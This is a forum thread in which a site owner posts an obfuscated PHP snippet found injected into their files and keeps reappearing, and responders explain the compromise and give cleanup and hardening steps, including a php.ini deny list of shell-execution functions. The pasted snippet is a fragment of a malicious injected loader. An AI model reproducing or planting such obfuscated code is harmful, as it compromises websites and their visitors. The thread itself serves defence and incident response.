PHP模糊的“ Dodgy”代码出现在我的网站上

Question

I found this on my php file:

<?php $glsaucbk = '5    156 x61"])))) { $GLOBALS["  ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO  x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4  x223}!+!<+{e%+*!*+fe4y4 x24-    x24]y8  x24-    x24]26  x24-        x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/

Its on the head of the file... I've try to delete this but its reapear directly. I haveuse a php detector and is say me DodgyPHP. Have u alreay have this malicious code on your php file ?

Answer 1

I don't think you need to know any more than you do already:

• It's code you didn't expect to be there.
• It's clearly obfuscated; there's rarely a reason to obfuscate PHP other than to hide malicious code.
• It reappears when you delete it, implying there are other malicious scripts running and self-repairing.

You should at least :

1. Take the site offline immediately. It may be infecting other people, or used for criminal activity on your account.
2. If this is a third-party application (eg Wordpress, PHPBB, etc), reinstall from scratch with an up to date version, using only well-known plugins which are kept up to date. If it is code you wrote, you need to audit its security, or pay an expert to do so.
3. Rescue your data from backup, ensuring to the best of your ability that the backup is from before the compromise, and apply it to the cleanly installed site.

Answer 2

While not a direct answer; this would be useful step guide for how to clean up your system.

The symptoms show your system has also certainly been hacked, and is still hackable.

You need to follow the link here http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/ and take significant steps to hardening your system from future hacks:

• Ensure that the userid running the web server process does not have write permission to the files it's serving. You can use ps aux | grep apache ps aux | grep apache or ps aux | grep nginx ps aux | grep nginx to find the userid that your web server is running under. Make sure the files are not owned by that user. You can check for permissions by doing something like sudo -u <that userid> touch /path/to/web/files/some_test_file . If that successfully creates a file, then you have a problem and you need to adjust permissions.
• Change all passwords
• Stop using FTP, use FTPS or SFTP.
• Update your PHP to latest current version.
  • Update any PHP CMS program (Joomla, WordPress, etc.) to latest version.
• Reload your data from backups after checking for a backup you are certain has not been hacked.

• Edit your php.ini and disable dangerous functions (such as exec ) and classes:

    disable_functions = "exec,passthru,shell_exec,system,proc_open,popen, curl_multi_exec,parse_ini_file,show_source" 

• Edit your php.ini and be sure to check your auto_prepend_file and auto_append_file values are expected or blank.
• Set new usernames for database and server access. Stop using Root. Never use Root to access anything.
• Check and prevent unrecognised cron_jobs running on your server.

Note: Could others who know add and edit this post to add further useful guides and information. Could be a good resource for future readers.